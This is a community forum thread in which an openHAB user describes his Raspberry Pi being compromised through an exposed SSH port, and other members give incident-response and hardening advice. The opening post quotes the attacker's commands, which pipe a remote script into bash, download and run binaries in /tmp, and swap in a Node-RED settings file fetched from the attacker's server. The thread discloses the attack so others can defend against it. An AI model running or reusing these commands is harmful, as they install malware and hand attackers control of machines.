Openhab Servers potential target for attacs

, ,
1

Hello Together,

this is just for Information, my question is at the end…

Yesterday my openhab server, running on RasPi4 was attacked by someone unknown and they managed to run some commands as sudo, this happens between 20h and 00h:

curl http://45.80.153.168:26/ip2.sh | bash

apt update -y; apt install curl cron nano -y; service cron start; uname -a

sudo apt update -y; sudo apt install curl cron nano -y; sudo service cron start; uname -a

cd /tmp; curl -o php http://185.28.39.15/x-8.6-.ISIS; chmod +x php; ./php; rm -rf php

cd /tmp; curl -o php http://185.28.39.15/a-r.m-6.ISIS; chmod +x php; ./php; rm -rf php

cd ~/.node-red; mv settings.js test.js; curl -o settings.js http://185.28.39.15/nodered.txt

pkill node-red | node-red

I have no idea how they managed to come in, this is something I still try to figure out, for now I closed all ports on my router and now I want to find out what was damaged.

First of all, they downloaded an script file, and they run it, no idea what was inside as it is not available anymore, then they run two files, one for x86 and one for arm, it could be that the arm-file was run through. They are still available.
Infos about that arm file are here: Automated Malware Analysis Report for a-r.m-6.ISIS - Generated by Joe Sandbox

No Idea what that was doing, maybe I was involved in some kind of DDoS Attack. I also checked entries for crontab, for openhabian and for root, no entries there, no idea why they installed cron. And they exchanged my node-red settings, they changed that lines here:

...
adminAuth: {
    type: "credentials",
    users: [
        {
            username: "admin",
            password: "$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO",
            permissions: "*"
        },
        {
            username: "george",
            password: "$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO",
            permissions: "read"
        }
    ]
},
...
    httpNodeAuth: {user:"user",pass:"$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO"},
    httpStaticAuth: {user:"user",pass:"$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO"},
...

After that my existing flows were unreadable, I had to undo the changes and re-import the backuped flows again.

So just for your information, check all your open ports and create backups…

My next question is: Is it possible to run an AV-Scan in OpenHab System? How can I do this? I want to go for sure that there is no other files kept from that operation…

Greetings Jack

2

As you have several times in your post mentioned that you have no idea what the attackers have done, you will never be sure if everything is reminded from your system.

Therefore delete everything, reinstall, check that your backups are not corrupted and restore backups…

1 Like
3

Nothing special about “openhab servers” here. Just an openly accessible server, which happens to run openhab.
If you’re not 100% sure, what you are doing in fact - please never ever open ports in your router to any device in your home network at all.

With that out of the way: you can run whatever AV you want on your OS (you only mentioned Pi4 - assuming it’s Raspberry Pi OS).

But what I’d suggest:

  1. backup your openhab (assuming you backed up your nodered on the same machine, you know how)
  2. install either openHABian from scratch or do a manual installation
  3. restore your openhab backup (check for integrity first)
  4. perhaps re-install the rest of your applications on your Pi4

and! most importantly: make sure, you take the necessary precautions on network safety in your home network.
There’s normally no use case, in which you should open ports for your openhab server! But if you do so - you are responsible for that security issue, openHAB community does NOT RECOMMEND opening ports of any kind - except you know what you’re doing from heart.

1 Like
4

Of course, I know, I blame no one except me. :man_facepalming:
I opened the port for an reason, but then forgot to close it, my fault…

Yeah, I’m running the latest openhabian system for Raspberry Pi.

What is confusing me, is that they touched the node-red configuration, but then did nothing with it, w/o that I would not even notice the attack… :thinking:

Yes, that advice is clear, backup everything, install from scratch, restore… A lot of work… But it seems necessary… You mean an AV Scan would not change anything?

5

They got in - found something, changed the nodered to access it and potentially add some nodes (DDoS of whatever) and I guess they got interrupted or found something better - or dropped some sleeping script somewhere to unfold later. :man_shrugging: you’ll never know, if you’re not able to perform some forensic measures.

AV scan is part of a security strategy - but as you said, you are not sure, what they did an AV scan is not a real measure after the fact here. They could hidden some script somewhere neither you or a AV scan will discover anything.
So - vanilla system (best use a fresh SD card), restore checked (aka non-compromised) backups and step up your security measures and don’t open any ports again.

1 Like
6

Of interest is whether it was the openHAB ports that were exposed? If they got in through openHAB itself that’s worth further exploration. But if it was some other port/service there isn’t much we can do except to say “don’t do that.”

@Matze0211 and @binderth are spot on with their advice. Don’t waste time trying to fix what may have been done to your machine. You can never trust it again and there is almost certainly a RAT installed (Remote Access Trojan) so the attacker is still there.

Remove the machine from the network immediately and then restore from a full backup prior to the attack or start over from scratch. You can probably trust text based configs copied from this compromised machines but I wouldn’t trust any binaries.

But what hasn’t been said is to monitor all the rest of your machines on your LAN too. With this machine compromised, the attacker has had free access to all the machines on your LAN and may have compromised one or more of those too.

Usually, unless you lead a particularly interesting life, the motivation for these types of attacks are:

  • installing cryptominers (look for machines running hot for no apparent reason)
  • adding the machines to a bot herd for DDOS attacks
  • crypto locker/ransome (“I’ve encrypted all your files, pay me for the key.”)
  • identity theft

Nothing that you saw. They could have deleted the traces of their activity. If they installed a root kit, they could have gigabytes of stuff hidden on your machine that you can’t see.

That’s why you can’t trust that machine.

The only thing I can add here is that AV is only able to detect “known bad” stuff. Assuming that the AV can even see all the files that the attacker put on your machine it’s only going to detect files that have previously been submitted to the AV company and for which the AV vendor decided was worthy of generating a signature to detect.

This looks like a very targeted attack on Node Red running on a Linux machine. I doubt there are many if any AV software that can detect that. And even if they detect that they may not be able to remove it. But we also don’t know what else was done. We don’t know what was in those scripts and we don’t know what commands and stuff they may have done that didn’t get captured.

3 Likes
7

Are you running openHAB 2 or 3? There are good reasons to run V3 with increased security features, so do not use a V2 setup if that is what you are running. Also aimed at other users that continue to run old outdated software.

8

If you run an old openHAB version it may be vulnerable to Log4Shell, see:

9

It was port 22, SSH, but open on completely different port 3xxx. I changed the default password to an 8 char password with big, small and numeric letters. Seems that this was not strong enough.

Yeah, I have openhabian-config backups there, I think I can trust them, they shouldn’t have any binaries.
And I monitor other machines on the network, but it seems there is nothing, as they have different usernames, passwords and AV+firewall enabled.

openHAB 3.3.0, updated it nearly a week ago.

10

Or it got compromised elsewhere. You have evidence they logged in with this password?

11

I never understood why everyone is so big on moving ssh to some different port, as if it’s not the utmost simplicity to tell when ssh is running on any given port. It’s a totally lame protection measure which only serves to avoid the dumbest of script kiddies and attack bots filling your auth log with login attempts.

I don’t recommend exposing ssh to the Internet at all (use Tailscale or some other type of VPN) but if you do, at a minimum you should use certificate based login, not password based. Even better would be to configure two-factor authentication.

If you mean Amanda then that definitely does include binaries. But it’s not the binaries that you have to worry about. It’s the fact that the attacker had/has remote access to your network. You might be fine but don’t assume it. Take actions to help in case they managed to establish themselves on one of your other machines. Remember, username and password wasn’t enough to protect you from this attacker already.

A firewall is good but most of the time in a home environment they will allow any traffic from the LAN because the LAN is considered trusted. Make sure your firewalls are actually blocking traffic from the LAN or else the firewall is doing nothing. And the AV, as already discussed, is only going to detect known bad files. It’s not going to detect network based attacks usually and certainly won’t detect nor block activity on the machine that an attacker is doing manually.

Regardless, if it wasn’t OH that was exposed it likely wasn’t OH that was compromised so there isn’t anything we can/need to look into to make OH stronger because of this particular attack.

1 Like
12

There are similarities described here:

An other thing that came to my mind

13

What I seriously don’t get:
Why would you simply open a port in your router (most routers will tell you, how dangerous that is!) without any precautions, no WAF, no Firewall and obviously either weak passwords or outdated OS? And just be cool with it - until either somehow some application asks for a password or another server is unresponsive, because it’s getting hot with Malware/Crypto/whatever…

It’s so easy to set up a VPN and just have a safe home network. Seriously, smh…

14

For sure, as I had all the commands thy did in my command history for openhabian

Thats true, I just wanted to mention that maybe OH/NR is an new target for such attacks…
As @Wolfgang_S mentioned, it seems I’m not the only one who had that problems…

15

seeing the commands in the history does not necessarily mean that the password was used as entry point. In case there is a vulnerable process running with that users id it could be possible to get a shell for that user by using that vulnerability as entry point.
But in case ssh port was open to the internet ( as stated above ) and the default password for openhabian was not changed then this is most probably the way how the door was left open for the guest. As relation between openhab and openhabian is close for an attacker it is easy to check for default passwords for default users.

16

I changed the default password as mentioned above:

17

Hi,

I’m using Wireguard VPN to access my LAN remotely.
Is this a good/safe strategy?

1 Like
18

It’s part of a good/safe strategy. If you did not open ports in you router yourself, you should be fine.
As long as ports are to be opened from “within”, they’re not freely accessible from the “outside”. This is (or should be) standard behaviour on every decent internet router.

FYI: A VPN (be it wireguard or other decent strong ones) does allow you to access your home network without exposing you network actively to the internet. As long as you only use VPN to access your home network - you are way more secure as if you opened a port and use that for an “exposed host” without any other safety measures.

So a safe strategy is only using VPN to access your network remotely, as long as you’re following the other parts of safety guidelines: there’s external threats like the one described here and internal threats like activating a compromised USB stick or you clicking on a wrong internet address…
Goog entry point is

PS: if it’s only accessing your openHAB somehow, have a look at the openHAB Cloud, which allows you to access your items and do some commands - with the openHAB App for example:

19

Yes, perfectly fine.

Bit difficult with vanilla Wireguard server installed in your LAN. But it’s not an issue: Wireguard is silent on the port at all times unless the correct credentials are used.

1 Like
20

What I want to stress is: Don’t ever use “open port” or even “expose host” in your router unless you know exactly, what you’re doing.

We could talk about point2point or site2site VPNs at this time, best solution is always in the router (or DMZ). AVM FritzBoxes offer that - even wireguard with the next official release (and beta-FritzOS ATM).
But point being: accessing your network or one specific device via VPN is way more secure than “only” opening ports or exposing a host.